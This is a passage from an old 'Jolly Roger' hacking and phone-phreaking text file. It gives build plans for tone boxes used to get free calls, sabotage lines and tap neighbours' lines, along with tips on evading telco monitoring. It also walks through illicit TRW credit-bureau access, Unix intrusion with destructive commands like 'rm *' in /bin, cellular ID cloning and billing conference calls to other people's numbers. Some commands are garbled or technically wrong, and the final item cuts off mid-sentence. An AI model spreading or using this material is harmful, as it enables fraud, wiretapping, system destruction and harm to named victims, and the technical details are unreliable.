computer calls only. Here is why:
MCI and those other services can't really trace the calls that come through the
lines, they can just monitor them. They can listen in on your calls and from
that, they can get your name and
other information from the conversation. They can also call the number you
called and ask your friend some questions. If you call terminals and BBS'S then
it is much harder to get information. For one
thing, most sysops won't give these dudes that call any info at all or they will
act dumb because they PHREAK themselves!
2. Beware when using colored boxes! They are easy to find!!!!!
3. Try to find a sine-wave number. Then use an MCI or other service to call it.
You will hear a tone that goes higher and lower. If the tone just stops, then
that code is being monitored and you
should beware when using it.
If you do get caught, then if you think you can, try to weasel out of it. I have
heard many stories about people that have pleaded with the MCI guys and have
been let off. You will get a call from a guy
that has been monitoring you. Act nice. Act like you know it is now wrong to do
this kind of thing.....just sound like you are sorry for what you did. (If you
get a call, you probably will be a little sorry!)
Otherwise, it is very dangerous!!!!!!! (Very with a capital V!)
100.Red Box Plans by The Jolly Roger
Red boxing is simulating the tones produced by public payphones when you drop
your money in. The tones are beeps of 2200Hz + 1700Hz a nickle is 1 beep for 66
milliseconds. A dime is 2 beeps,
each 66 milliseconds with a 66 millisecond pause between beeps. A quarter is 5
beeps, each 33 milliseconds with a 33 millisecond pause between beeps.
There are two commonly used methods being used by Phreaks to make free calls.
1. An electronic hand-held device that is made from a pair of Wien-bridge
oscillators with the timing controlled by 555 timing chips.
2. A tape recording of the tones produced by a home computer. One of the best
computers to use would be an Atari ST. It is one of the easier computers to use
because the red box tones
can be produced in basic with only about 5 statements.
101.RemObS by The Jolly Roger
Some of you may have heard of devices called Remobs which stands for Remote
Observation System. These Devices allow supposedly authorized telephone
employees to dial into them from
anywhere, and then using an ordinary touch tone fone, tap into a customer's line
in a special receive only mode. [The mouthpiece circuit is deactivated, allowing
totally silent observation from any fone in
the world (Wire tapping without a court order is against the law)]
How Remobs Work
Dial the number of a Remob unit. Bell is rumored to put them in the 555
information exchanges, oron special access trunks [Unreachable except via blue
box]. A tone will then be heard for
approximately 2 seconds and then silence. You must key in (In DTMF) a 2 to 5
digit access code while holding each digit down at least 1 second. If the code
is not entered within 5 or 6 seconds, the
Remob will release and must be dialed again. If the code is supposedly another
tone will be heard. A seven digit subscriber fone number can then be entered
[The Remob can only handle certain
'exchanges' which are prewired, so usually one machine cannot monitor an entire
NPA]. The Remob will then connect to the subscribers line. The listener will
hear the low level idle tone as long as the
monitored party is on hook. As the monitored party dials [rotary or DTMF], the
listener would hear [And Record] the number being dialed. Then the ENTIRE
conversation, datalink, whatever is taking
place, all without detection. There is no current box which can detect Remob
observation, since it is being done with the telephone equipment that makes the
connection. When the listener is finished
monitoring of that particular customer, he keys the last digit of the access
code to disconnects him from the monitored line and return to the tone so that
he can key in another 7 digit fone number. When
the listener is totally finished with the Remob, he keys a single 'disconnect
digit' which disconnects him from the Remob so that the device can reset and be
ready for another caller.
History of Remobs
Bell has kept the existence of Remobs very low key. Only in 1974, Bell
acknowledged that Remobs existed. The device was first made public during
hearings on "Telephone Monitoring Practices by
Federal Agencies" before a subcommittee on government operations. House of
Representatives, Ninety-Third Congress, June 1974. It has since been stated by
Bell that the Remob devices are used
exclusively for monitoring Bell employees such as operators, information
operators, etc., to keep tabs on their performance. [Suuureee, were stupid]
Possible Uses for Remobs
The possible uses of Remobs are almost as endless as the uses of self created
fone line. Imagine the ability to monitor bank lines etc, just off the top of my
head I can think of these applications:
Data Monitoring of:
· TRW
· National Credit Bureau.
· AT&T Cosmos.
· Bank Institutions.
· CompuServe and other Networks.
Voice Monitoring of:
· Bank Institutions.
· Mail Order businesses.
· Bell Telephone themselves.
· Any place handling sensitive or important information.
· Anyone that you may not like.
With just one Remob, someone could get hundreds of credit cards, find out who
was on vacation, get CompuServe passwords by the dozens, disconnect peoples
fones, do credit checks, find out
about anything that they may want to find out about. I'm sure you brilliant can
see the value of a telephone hobbyist and a telecommunications enthusiast
getting his hands on a few choice Remobs.
<Grin>
Caution
If any reader should discover a Remob during his (or her) scanning excursions,
please keep in mind the very strict federal laws regarding wiretapping and
unauthorized use of private Bell property.
102.Scarlet Box Plans by The Jolly Roger
The purpose of a Scarlet box is to create a very bad connection, it can be used
to crash a BBS or just make life miserable for those you seek to avenge.
Materials:
· 2 alligator clips
· 3 inch wire, or a resister (plain wire will create greatest amount of static)
(Resister will decrease the amount of static in proportion to the resister you
are using)
1. Find the phone box at your victims house, and pop the cover off.
2. Find the two prongs that the phone line you wish to box are connected to.
3. Hook your alligator clips to your (wire/resister).
4. Find the lower middle prong and take off all wires connected to it, I think
this disables the ground and call waiting and shit like that.
5. Now take one of the alligator clips and attach it to the upper most prong,
and take the other and attach it to the lower middle prong.
6. Now put the cover back on the box and take off!!
** ######## **
** # #### # **
######## /
# #### # /
######## /
/
/
/
/
/
/
/
**/
**
**
**
**
**
(**)= prongs
**
(/) = (wire/resister)
(##)= some phone bullshit
103.Silver Box Plans by The Jolly Roger
Introduction:
First a bit of Phone Trivia. A standard telephone keypad has 12 buttons. These
buttons, when pushed, produce a combination of two tones. These tones represent
the row and column of the button
you are pushing.
1 1 1
2 3 4
0 3 7
9 6 7
697 (1) (2) (3)
770 (4) (5) (6)
851 (7) (8) (9)
941 (*) (0) (#)
So (1) produces a tone of 697+1209, (2) produces a tone of 697+1336, etc.
Function:
What the Silver Box does is just creates another column of buttons, with the new
tone of 1633. These buttons are called A, B, C, and D.
Usefulness:
Anyone who knows anything about phreaking should know that in the old days of
phreaking, phreaks used hardware to have fun instead of other people's Sprint
and MCI codes. The most famous
(and useful) was the good ol' Blue Box. However, Ma Bell decided to fight back
and now most phone systems have protections against tone-emitting boxes. This
makes boxing just about futile in most
areas of the United States (i.e. those areas with Crossbar or Step-By-Step). If
you live in or near a good-sized city, then your phone system is probably
up-to-date (ESS) and this box (and most
others) will be useless. However, if you live in the middle of nowhere (no
offense intended), you may find a use for this and other boxes.
Materials:
· 1 Foot of Blue Wire
· 1 Foot of Gray Wire
· 1 Foot of Brown Wire
· 1 Small SPDT Switch (*)
· 1 Standard Ma Bell Phone
(*)SPDT = Single Pole/Double Throw
Tools:
· 1 Soldering Iron
· 1 Flat-Tip Screwdriver
Procedure:
1. Loosen the two screws on the bottom of the phone and take the casing off.
2. Loosen the screws on the side of the keypad and remove the keypad from the
mounting bracket.
3. Remove the plastic cover from the keypad.
4. Turn the keypad so that *0# is facing you. Turn the keypad over. You'll see a
bunch of wires, contacts, two Black Coils, etc.
5. Look at the Coil on the left. It will have five (5) Solder Contacts facing
you. Solder the Gray Wire to the fourth Contact Pole from the left.
6. Solder the other end of the Gray Wire to the Left Pole of the SPDT Switch.
7. Find the Three (3) Gold-Plated Contacts on the bottom edge of the keypad. On
the Left Contact, gently separate the two touching Connectors (they're soldered
together) and spread them
apart.
8. Solder the Brown Wire to the Contact farthest from you, and solder the other
end to the Right Pole of the SPDT Switch.
9. Solder the Blue Wire to the Closest Contact, and the other end to the Center
Pole of the SPDT Switch.
10. Put the phone back together.
Using The Silver Box:
What you have just done was installed a switch that will change the 369# column
into an ABCD column. For example, to dial a 'B', switch to Silver Box Tones and
hit '6'.
No one is sure of the A, B, and C uses. However, in an area with an old phone
system, the 'D' button has an interesting effect. Dial Directory Assistance and
hold down 'D'. The phone will ring, and
you should get a pulsing tone. If you get a pissed-off operator, you have a
newer phone system with defenses against Silver Boxes. At the pulsing tone, dial
a 6 or 7. These are loop ends.
104.Bell Trashing by The Jolly Roger
The Phone Co. will go to extremes on occasions. In fact, unless you really know
what to expect from them, they will surprise the heck out of you with their
"unpublished tariffs". Recently, a situation
was brought to my attention that up till then I had been totally unaware of,
least to mention, had any concern about. It involved garbage! The phone co. will
go as far as to prosecute anyone who
rummages through their garbage and helps himself to some
Of course, they have their reasons for this, and no doubt benefit from such
action. But, why should they be so picky about garbage? The answer soon became
clear to me: those huge metal bins are
filled up with more than waste old food and refuse... Although it is Pacific
Tele. policy to recycle paper waste products, sometimes employees do overlook
this sacred operation when sorting the
garbage. Thus top-secret confidential Phone Co. records go to the garbage bins
instead of the paper shredders. Since it is constantly being updated with
"company memorandums, and supplied with
extensive reference material, the Phone co. must continually dispose of the
outdated materials. Some phone companies are supplied each year with the
complete "System Practices" guide. This
publication is an over 40 foot long library of reference material about
everything to do with telephones. As the new edition arrives each year, the old
version of "System Practices" must also be thrown
out.
I very quickly figured out where some local phone phreaks were getting their
material. They crawl into the garbage bins and remove selected items that are of
particular interest to them and their fellow
phreaks. One phone phreak in the Los Angeles area has salvaged the complete 1972
edition of "Bell System Practices". It is so large and was out of order (the
binders had been removed) that it took
him over a year to sort it out and create enough shelving for it in his garage.
Much of this "Top Secret" information is so secret that most phone companies
have no idea what is in their files. They have their hands full simply replacing
everything each time a change in wording
requires a new revision. It seems they waste more paper than they can read!
It took quite a while for Hollywood Cal traffic manager to figure out how all of
the local phone phreaks constantly discovered the switchroom test numbers.
Whenever someone wanted to use the testboard, they found the local phone phreaks
on the lines talking to all points all over the world. It got to the point where
the local garbage buffs knew more
about the office operations than the employees themselves. One phreak went so
far as to call in and tell a switchman what his next daily assignment would be.
This, however, proved to be too much.
The switchman traced the call and one phone phreak was denied the tool of his
trade.
In another rather humorous incident, a fellow phreak was rummaging through the
trash bin when he heard someone approaching. He pressed up against the side of
the bin and silently waited for the
goodies to come. You can imagine his surprise when the garbage from the
lunchroom landed on his head. Most people find evenings best for checking out
their local Telco trash piles. The only thing
necessary is a flashlight and, in the case mentioned above, possibly a rain
coat. A word of warning though, before you rush out and dive into the trash
heap. It is probably illegal, but no matter where
you live, you certainly won't get the local policeman to hold your flashlight
for you.
105.Canadian WATS Phonebook by The Jolly Roger
800-227-4004 ROLM Collagen Corp.
800-227-8933 ROLM Collagen Corp.
800-268-4500 Voice Mail
800-268-4501 ROLM Texaco
800-268-4505 Voice Mail
800-268-6364 National Data Credit
800-268-7800 Voice Mail
800-268-7808 Voice Mail
800-328-9632 Voice Mail
800-387-2097 Voice Mail
800-387-2098 Voice Mail
800-387-8803 ROLM Canadian Tire
800-387-8861 ROLM Canadian Tire
800-387-8862 ROLM Canadian Tire
800-387-8863 ROLM Canadian Tire
800-387-8864 ROLM Canadian Tire
800-387-8870 ROLM Halifax Life
800-387-8871 ROLM Halifax Life
800-387-9115 ASPEN Sunsweep
800-387-9116 ASPEN Sunsweep
800-387-9175 PBX [Hold Music = CHUM FM]
800-387-9218 Voice Messenger
800-387-9644 Carrier
800-426-2638 Carrier
800-524-2133 Aspen
800-663-5000 PBX/Voice Mail [Hold Music = CFMI FM]
800-663-5996 Voice Mail (5 rings)
800-847-6181 Voice Mail
NOTES: Each and every one of these numbers is available to the 604 (British
Columbia) Area Code. Most are available Canada Wide and some are located in the
United States. Numbers designated
ROLM have been identified as being connected to a ROLM Phonemail system. Numbers
designated ASPEN are connected to an ASPEN voice message system. Numbers
designated VOICE MAIL
have not been identified as to equipment in use on that line. Numbers designated
carrier are answered by a modem or data set. Most Voice Message systems, and ALL
Rolms, sound like an answering
machine. Press 0 during the recording when in a rolm, * or # or other DTMF in
other systems, and be propelled into another world...
106.Hacking TRW by The Jolly Roger
When you call TRW, the dial up will identify itself with the message
"TRW". It will then wait for you to type the appropriate answer back (such as
CTRL-G) Once This has been done, the system will say "CIRCUIT BUILDING IN
PROGRESS" Along with a few
numbers. After this, it clears the screen (CTRL L) followed by a CTRL-Q. After
the system sends the CTRL-Q, It is ready for the request. You first type the 4
character identifier for the geographical
area of the account..
(For Example) TCA1 - for certain Calif. & Vicinity subscribers.
TCA2 - A second CALF. TRW System.
TNJ1 - Their NJ Database.
TGA1 - Their Georgia Database.
The user then types A <CR> and then on the next line, he must type his 3 char.
Option. Most Requests use the RTS option. OPX, RTX, and a few others exist.
(NOTE) TRW will accept an A, C, or
S as the 'X' in the options above.) Then finally, the user types his 7 digit
subscriber code. He appends his 3-4 character password after it. It seems that
if you manage to get hold of a TRW Printout
(Trashing at Sears, Saks, ETC. or from getting your credit printout from them)
Their subscriber code will be on it leaving only a 3-4 character p/w up to you.
For Example,
(Call the DialUp)
TRW System Types, (ST) CTRL-G
(You type, YT) Circuit building in progress 1234
(ST) CTRL-L CRTL-Q (TCA1 CYT) BTS 3000000AAA
<CR><CRTL-S> (YT]
Note: This system is in Half Duplex, Even Parity, 7 Bits per word and 2 Stop
Bits.
CAUTION: It is a very stressed rumor that after typing in the TRW password Three
(3) times.. It sets an Automatic Number Identification on your ass, so be
careful. And forget who told you how to
do this..
107.Hacking Vax's & Unix by The Jolly Roger
Unix is a trademark of AT&T (and you know what that means)
In this article, we discuss the unix system that runs on the various vax
systems. If you are on another unix-type system, some commands may differ, but
since it is licensed to bell, they can't make many
changes.
Hacking onto a unix system is very difficult, and in this case, we advise having
an inside source, if possible. The reason it is difficult to hack a vax is this:
Many vax, after you get a carrier from them,
respond=>
Login:
They give you no chance to see what the login name format is. Most commonly used
are single words, under 8 digits, usually the person's name. There is a way
around this: Most vax have an acct.
called 'suggest' for people to use to make a suggestion to the system root
terminal. This is usually watched by the system operator, but at late he is
probably at home sleeping or screwing someone's
brains out. So we can write a program to send at the vax this type of a message:
A screen freeze (Cntl-S), screen clear (system dependant), about 255 garbage
characters, and then a command to
create a login acct., after which you clear the screen again, then unfreeze the
terminal. What this does: When the terminal is frozen, it keeps a buffer of what
is sent. Well, the buffer is about 127
characters long. so you overflow it with trash, and then you send a command line
to create an acct. (System dependant). After this you clear the buffer and
screen again, then unfreeze the terminal. This
is a bad way to do it, and it is much nicer if you just send a command to the
terminal to shut the system down, or whatever you are after... There is always,
*Always* an acct. called root, the most
powerful acct. to be on, since it has all of the system files on it. If you hack
your way onto this one, then everything is easy from here on... On the unix
system, the abort key is the Cntl-D key. Watch
how many times you hit this, since it is also a way to log off the system! A
little about unix architecture: The root directory, called root, is where the
system resides. After this come a few 'sub' root
directories, usually to group things (stats here, priv stuff here, the user log
here...). Under this comes the superuser (the operator of the system), and then
finally the normal users. In the unix 'Shell'
everything is treated the same.
By this we mean: You can access a program the same way you access a user
directory, and so on. The way the unix system was written, everything, users
included, are just programs belonging to the
root directory. Those of you who hacked onto the root, smile, since you can
screw everything...the main level (exec level) prompt on the unix system is the
$, and if you are on the root, you have a #
(superuser prompt). Ok, a few basics for the system... To see where you are, and
what paths are active in regards to your user account, then type
=> pwd
This shows your acct. separated by a slash with another pathname (acct.),
possibly many times. To connect through to another path, or many paths, you
would type:
You=> path1/path2/path3
And then you are connected all the way from path1 to path3. You can
run the programs on all the paths you are connected to. If it does
not allow you to connect to a path, then you have insufficient privs, or
the path is closed and archived onto tape. You can run programs this way
also:
you=> path1/path2/path3/program-name
Unix treats everything as a program, and thus there a few commands to learn...
To see what you have access to in the end path, type:
ls
for list. This show the programs you can run. You can connect to the root
directory and run it's programs with=>
/root
By the way, most unix systems have their log file on the root, so you can set up
a watch on the file, waiting for people to log in and snatch their password as
it passes thru the file. To connect to a
directory, use the command:
=> cd pathname
This allows you to do what you want with that directory. You may be asked for a
password, but this is a good way of finding other user names to hack onto. The
wildcard character in unix, if you want
to search down a path for a game or such, is the *.
=> ls /*
Should show you what you can access. The file types are the same as they are on
a dec, so refer to that section when examining file. To see what is in a file,
use the
=> pr
filename command, for print file. We advise playing with pathnames to get the
hang of the concept. There is on-line help available on most systems with a
'help' or a '?'. We advise you look thru the
help files and pay attention to anything they give you on pathnames, or the
commands for the system. You can, as a user, create or destroy directories on
the tree beneath you. This means that root can
kill everything but root, and you can kill any that are below you. These are the
=> mkdir pathname
=> rmdir pathname
commands. Once again, you are not alone on the system... type=>
who
to see what other users are logged in to the system at the time. If you
want to talk to them=>
write username
Will allow you to chat at the same time, without having to worry about the
parser. To send mail to a user, say
=> mail
And enter the mail sub-system. To send a message to all the users on the system,
say
=> wall
Which stands for 'write all'. By the way, on a few systems, all you have to do
is hit the <return> key to end the message, but on others you must hit the
cntl-D key. To send a single message to a user,
say
=> write username
this is very handy again! If you send the sequence of characters discussed at
the very beginning of this article, you can have the super-user terminal do
tricks for you again.
Privs:
If you want superuser privs, you can either log in as root, or edit your acct.
so it can say
=> su
this now gives you the # prompt, and allows you to completely by-pass the
protection. The wonderful security conscious developers at bell made it very
difficult to do much without privs, but once you
have them, there is absolutely nothing stopping you from doing anything you want
to. To bring down a unix system:
=> chdir /bin
=> rm *
this wipes out the pathname bin, where all the system maintenance files are. Or
try:
=> r -r
This recursively removes everything from the system except the remove command
itself. Or try:
=> kill -1,1
=> sync
This wipes out the system devices from operation. When you are finally sick and
tired from hacking on the vax systems, just hit your cntl-d and repeat key, and
you will eventually be logged out.
The reason this file seems to be very sketchy is the fact that bell has 7
licensed versions of unix out in the public domain, and these commands are those
common to all of them. I recommend you hack
onto the root or bin directory, since they have the highest levels of privs, and
there is really not much you can do (except develop software) without them.
108.Verification Circuits by The Jolly Roger
1. One busy verification conference circuit is always provided. The circuit is a
three-way conference bridge that enables an operator to verify the busy/idle
condition of a subscriber line. Upon
request of a party attempting to reach a specified directory number, the
operator dials the called line number to determine if the line is in use, if the
receiver is off the hook, or if the line is in lockout due
to a fault condition. The operator then returns to the party trying to reach the
directory number and states the condition of the line. Lines with data security
can not be accessed for busy verification
when the line is in use.(Refer also to data security.)
2. Three ports are assigned to each busy verification conference circuit. One
port is for operator access and two ports are used to split an existing
connection. To verify the busy/idle condition
of a line, the operator established a connection to the operator access port and
dials the directory number of the line to be verified. If the line is in use,
the existing connection is broken and immediately
re-established through the other two ports of the busy verification circuit
without interruption. Busy verification circuit is controlled by access code. A
dedicated trunk can be used but is not necessary.
3. The busy verification circuit also can be used for test verify from the wire
chiefs test panel B. Additional busy verification conference circuits (002749)
there it is right out of an ESS manual
word for word! And I'm getting 25 linear feet of ESS manuals!!! Not counting the
stack received so far!
109.White Box Plans by The Jolly Roger
Introduction:
The White Box is simply a portable touch-tone keypad. For more information on
touch-tone, see my Silver Box Plans.
Materials:
· 1 Touch-Tone Keypad
· 1 Miniature 1000 to 8 Ohm Transformer (Radio Shack # 273-1380)
· 1 Standard 8 Ohm Speaker
· 2 9V Batteries
· 2 9V Battery Clips
Procedure:
1. Connect the Red Wire from the Transformer to either terminal on the speaker.
2. Connect the White Wire from the transformer to the other terminal on the
speaker.
3. Connect the Red Wire from one Battery Clip to the Black Wire from the other
Battery Clip.
4. Connect the Red Wire from the second Battery Clip to the Green Wire from the
Keypad.
5. Connect the Blue Wire from the Keypad to the Orange/Black Wire from the
Keypad.
6. Connect the Black Wire from the first Battery Clip to the two above wires
(Blue and Black/Orange).
7. Connect the Black Wire from the Keypad to the Blue Wire from the Transformer.
8. Connect the Red/Green Wire from the Keypad to the Green Wire from the
Transformer.
9. Make sure the Black Wire from the Transformer and the remaining wires from
the Keypad are free.
10. Hook up the Batteries.
Optional:
1. Put it all in a case.
2. Add a Silver Box to it.
Use:
Just use it like a normal keypad, except put the speaker next to the receiver of
the phone you're using.
110.The BLAST Box by The Jolly Roger
Ever want to really make yourself be heard? Ever talk to someone on the phone
who just doesn't shut up? Or just call the operator and pop her eardrum? Well,
up until recently it has been impossible
for you to do these things. That is, unless of course you've got a blast box.
All a blast box is, is a really cheap amplifier, (around 5 watts or so)
connected in place of the microphone on your telephone.
It works best on model 500 AT&T Phones, and if constructed small enough, can be
placed inside the phone.
Construction:
Construction is not really important. Well it is, but since I'm letting you make
your own amp, I really don't have to include this.
Usage:
Once you've built your blast box, simply connect a microphone (or use the
microphone from the phone) to the input of the amplifier, and presto. There it
is. Now, believe it or not, this device actually
works. (At least on crossbar.) It seems that Illinois bell switching systems
allow quite a lot of current to pass right through the switching office, and out
to whoever you're calling. When
you talk in the phone, it comes out of the other phone (again it works best if
the phone that you're calling has the standard western electric earpiece)
incredibly loud. This device is especially good for
PBS Subscription drives. Have "Phun", and don't get caught!
111.Dealing with the Rate & Route Operator by The Jolly Roger
It seems that fewer and fewer people have blue boxes these days, and that is
really too bad. Blue boxes, while not all that great for making free calls
(since the TPC can tell when the call was made, as
well as where it was too and from), are really a lot of fun to play with. Short
of becoming a real live TSPS operator, they are about the only way you can
really play with the network.
For the few of you with blue boxes, here are some phrases which may make life
easier when dealing with the rate & route (R&R) operators. To get the R&R op,
you send a KP + 141 + ST. In some
areas you may need to put another NPA before the 141 (i.e., KP + 213 + 141 +
ST), if you have no local R&R ops.
The R&R operator has a myriad of information, and all it takes to get this data
is mumbling cryptic phrases. There are basically four special phrases to give
the R&R ops. They are NUMBERS route,
DIRECTORY route, OPERATOR route, and PLACE NAME.
To get an R&R an area code for a city, one can call the R&R operator and ask for
the numbers route. For example, to find the area code for Carson City, Nevada,
we'd ask the R&R op for "Carson
City, Nevada, numbers route, please." and get the answer, "Right... 702 plus."
meaning that 702 plus 7 digits gets us there.
Sometimes directory assistance isn't just NPA+131. The way to get these routings
is to call R&R and ask for "Anaheim, California, directory route, please." Of
course, she'd tell us it was 714 plus,
which means 714 + 131 gets us the D.A. op there. This is sort of pointless
example, but I couldn't come up with a better one on short notice.
Let's say you wanted to find out how to get to the inward operator for
Sacremento, California. The first six digits of a number in that city will be
required (the NPA and an NXX). For example, let us
use 916 756. We would call R&R, and when the operator answered, say, "916 756,
operator route, please." The
operator would say, "916 plus 001 plus." This means that 916 + 001 + 121 will
get you the inward operator for Sacramento. Do you know the city which
corresponds to 503 640? The R&R
operator does, and will tell you that it is Hillsboro, Oregon, if you sweetly
ask for "Place name, 503 640, please."
For example, let's say you need the directory route for Sveg, Sweden. Simply
call R&R, and ask for, "International, Baden, Switzerland. TSPS directory route,
please." In response to this, you'd get,
"Right... Directory to Sveg, Sweden. Country code 46 plus 1170." So you'd route
yourself to an international sender, and send 46 + 1170 to get the D.A. operator
in Sweden.
Inward operator routings to various countries are obtained the same way
"International, London, England, TSPS inward route, please." and get "Country
code 44 plus 121." Therefore, 44 plus 121
gets you inward for London.
Inwards can get you language assistance if you don't speak the language. Tell
the foreign inward, "United States calling. Language assistance in completing a
call to (called party) at (called number)."
R&R operators are people are people too, y'know. So always be polite, make sure
use of 'em, and dial with care.
112.Cellular Phreaking by The Jolly Roger
The cellular/mobile phone system is one that is perfectly set up to be exploited
by phreaks with the proper knowledge and equipment. Thanks to deregulation, the
regional BOC's (Bell Operating
Companies) are scattered and do not communicate much with each other. Phreaks
can take advantage of this by pretending to be mobile phone customers whose
"home base" is a city served by a
different BOC, known as a "roamer". Since it is impractical for each BOC to keep
track of the customers of all the other BOC's, they will usually allow the
customer to make the calls he wishes, often
with a surcharge of some sort.
The bill is then forwarded to the roamer's home BOC for collection. However, it
is fairly simple (with the correct tools) to create a bogus ID number for your
mobile phone, and pretend to be a roamer
from some other city and state, that's "just visiting". When your BOC tries to
collect for the calls from your alleged "home BOC", they will discover you are
not a real customer; but by then, you can
create an entirely new electronic identity, and use that instead.
How does the cellular system know who is calling, and where they are? When a
mobile phone enters a cell's area of transmission, it transmits its phone number
and its 8 digit ID number to that cell, who
will keep track of it until it gets far enough away that the sound quality is
sufficiently diminished, and then the phone is "handed off" to the cell that the
customer has walked or driven into. This process
continues as long as the phone has power and is turned on. If the phone is
turned off (or the car is), someone attempting to call the mobile phone will
receive a recording along the lines of "The mobile
phone customer you have dialed has left the vehicle or driven out of the service
area." When a call is made to a mobile phone, the switching equipment will check
to see if the mobile phone being
called is "logged in", so to speak, or present in one of the cells. If it is,
the call will then act (to the speaking parties) just like a normal call - the
caller may hear a busy tone, the phone may just ring, or
the call may be answered.
How does the switching equipment know whether or not a particular phone is
authorized to use the network? Many times, it doesn't. When a dealer installs a
mobile phone, he gives the phone's ID
number (an 8 digit hexadecimal number) to the local BOC, as well as the phone
number the BOC assigned to the customer. Thereafter, whenever a phone is present
in one of the cells, the two
numbers are checked - they should be registered to the same person. If they
don't match, the telco knows that an attempted fraud is taking place (or at
best, some transmission error) and will not allow
calls to be placed or received at that phone. However, it is impractical
(especially given the present state of deregulation) for the telco to have
records of every cellular customer of every BOC.
Therefore, if you're going to create a fake ID/phone number combination, it will
need to be "based" in an area that has a cellular system (obviously), has a
different BOC than your local area does, and
has some sort of a "roamer"
agreement with your local BOC.
How can one "phreak" a cellular phone? There are three general areas when
phreaking cellular phones; using one you found in an unlocked car (or an
unattended walk-about model), modifying your
own chip set to look like a different phone, or recording the phone number/ID
number combinations sent by other local cellular phones, and using those as your
own. Most cellular phones include a
crude "password" system to keep unauthorized users from using the phone -
however, dealers often set the password (usually a 3 to 5 digit code) to the
last four digits of the customer's mobile phone
number. If you can find that somewhere on the phone, you're in luck. If not, it
shouldn't be TOO hard to hack, since most people aren't smart enough to use
something besides "1111", "1234", or
whatever. If you want to modify the chip set in a cellular phone you bought (or
stole), there are two chips (of course, this depends on the model and
manufacturer, yours may be different) that will need to be changed - one
installed at the manufacturer (often epoxied in) with the phone's ID number, and
one installed by the dealer with the phone
number, and possible the security code. To do this, you'll obviously need an
EPROM burner as well as the same sort of chips used in the phone (or a friendly
and unscrupulous dealer!). As to
recording the numbers of other mobile phone customers and using them; as far as
I know, this is just theory... but it seems quite possible, if you've got the
equipment to record and decode it. The
cellular system would probably freak out if two phones (with valid ID/phone
number combinations) were both present in the network at once, but it remains to
be seen what will happen.
113.Cheesebox Plans by The Jolly Roger
A Cheesebox (named for the type of box the first one was found in) is a type of
box which will, in effect, make your telephone a Pay-Phone.....This is a simple,
modernized, and easy way of doing it....
Inside Info: These were first used by bookies many years ago as a way of making
calls to people without being called by the cops or having their numbers traced
and/or tapped......
How To Make A Modern Cheese Box
Ingredients:
· 1 Call Forwarding service on the line
· 1 Set of Red Box Tones
· The number to your prefix's Intercept operator (do some scanning for this one)
How To:
After you find the number to the intercept operator in your prefix, use your
call-forwarding and forward all calls to her...this will make your phone stay
off the hook(actually, now it waits for a quarter to
be dropped in)...you now have a cheese box... In Order To Call Out On This Line:
You must use your Red Box tones and generate the quarter dropping in...then, you
can make phone calls to
people...as far as I know, this is fairly safe, and they do not check
much...Although I am not sure, I think you can even make credit-card calls from
a cheesebox phone and not get traced...
114.How to start your own conferences! by The Jolly Roger
Black Bart showed how to start a conference call thru an 800 exchange, and I
will now explain how to start a conference call in a more orthodox fashion, the
2600Hz. Tone.
Firstly, the fone company has what is called switching systems. There are
several types, but the one we will concern ourselves with, is ESS (electronic
switching system). If your area is zoned for ESS,
do not start a conference call via the 2600Hz. Tone, or bell security will nail
your ass! To find out if you are under ESS, call your local business office, and
ask them if you can get call
waiting/forwarding, and if you can, that means that you are in ESS country, and
conference calling is very, very dangerous!!! Now, if you are not in ESS, you
will need the following equipment:
· An Apple CAT II modem
· A copy of TSPS 2 or CAT'S Meow
· A touch tone fone line
· A touch tone fone. (True tone)
Now, with TSPS 2, do the following:
1. Run tsps 2
2. Chose option 1
3. Chose option 6
4. Chose sub-option 9
5. Now type: 1-514-555-1212 (dashes are not needed)
6. Listen with your handset, and as soon as you hear a loud click, then type: $
7. To generate the 2600 hz. Tone. This obnoxious tone will continue for a few
8. Seconds, then listen again and you should hear another loud 'click'.
9. Now type: km2130801050s
· 'K' = kp tone
· 'M' = multi frequency mode
· 'S' = s tone
10. Now listen to the handset again, and wait until you hear the 'click' again.
Then type: km2139752975s
· 2139751975 is the number to bill the conference call to.
Note: 213-975-1975 is a disconnected number, and I strongly advise that you only
bill the call to this number, or the fone company will find out, and then..
remember, conference calls are itemized, so
if you do bill it to an enemy's number, he can easily find out who did it and he
can bust you!
You should now hear 3 beeps, and a short pre-recorded message. From here on,
everything is all menu driven.
Conference call commands
From the '#' mode:
· 1 = call a number
· 6 = transfer control
· 7 = hangs up the conference call
· 9 = will call a conference operator
Stay away from 7 and 9! If for some reason an operator gets on-line, hang up! If
you get a busy signal after km2130801050s, that means that the teleconference
line is temporarily down. Try later,
preferably from 9am to 5pm week days, since conference calls are primarily
designed for business people.
115.Gold Box Plans by The Jolly Roger
HOW TO BUILD IT
You will need the following:
· Two 10K OHM and three 1.4K OHM resistors
· Two 2N3904 transistors
· Two Photo Cells
· Two Red LED'S (The more light produced the better)
· A box that will not let light in
· Red and Green Wire
Light from the #1 LED must shine directly on the photocell #1. The gold box I
made needed the top of the LED's to touch the photo cell for it to work.
The same applies to the #2 photo cell and LED.
1
:-PHOTOCELL--:
: :
: :BASE
: 1 TTTTT
: +LED- TRANSISTOR
: TTTTT
: : :
: -I(-- : :COLLECTOR
RED1--< >:--: :-------:-----GREEN2
-I(-- : ----------:
: :
2 :-/+/+/-/+/+/-/+/+/-/+/+/
LED 10K 10K 1.4K 1.4K
RESISTORES
2
-PHOTOCELL-----------------
: :
:BASE :
TTTTT :
TRANSISTOR :
TTTTT :
: :EMITTER :
GREEN1- --------------------------RED2
: :
/+/+/
1.4K
The 1.4K resistor is variable and if the second part of the gold box is skipped
it will still work but when someone picks up the phone they will hear a faint
dial tone in the background and might report it
to the Gestapo er...(AT&T). 1.4K will give you good reception with little risk
of a Gestapo agent at your door.
Now that you have built it take two green wires of the same length and strip the
ends, twist two ends together and connect them to green1 and place a piece of
tape on it with "line #1" writing on it.
Continue the process with red1 only use red wire. Repeat with red2 and green2
but change to line #2.
HOW TO INSTALL
You will need to find two phone lines that are close together. Label one of the
phone lines "Line #1". Cut the phone lines and take the outer coating off it.
There should be 4 wires. Cut the yellow and
black wires off and strip the red and green wires for both lines.
Line #1 should be in two pieces. Take the green wire of one end and connect it
to one of the green wires on the gold box. Take the other half of line #1 and
hook the free green wire to the green wire
on the phone line. Repeat the process with red1 and the other line. All you need
to do now is to write down the phone numbers of the place you hooked it up at
and go home and call it. You should get
a dial tone!!! If not, try changing the emitter with the collector.
116.The History of ESS by The Jolly Roger
Of all the new 1960s wonders of telephone technology - satellites, ultra modern
Traffic Service Positions (TSPS) for operators, the picturephone, and so on -
the one that gave Bell Labs the most
trouble, and unexpectedly became the greatest development effort in Bell
System's history, was the perfection of an electronic switching system, or ESS.
It may be recalled that such a system was the specific end in view when the
project that had culminated in the invention of the transistor had been launched
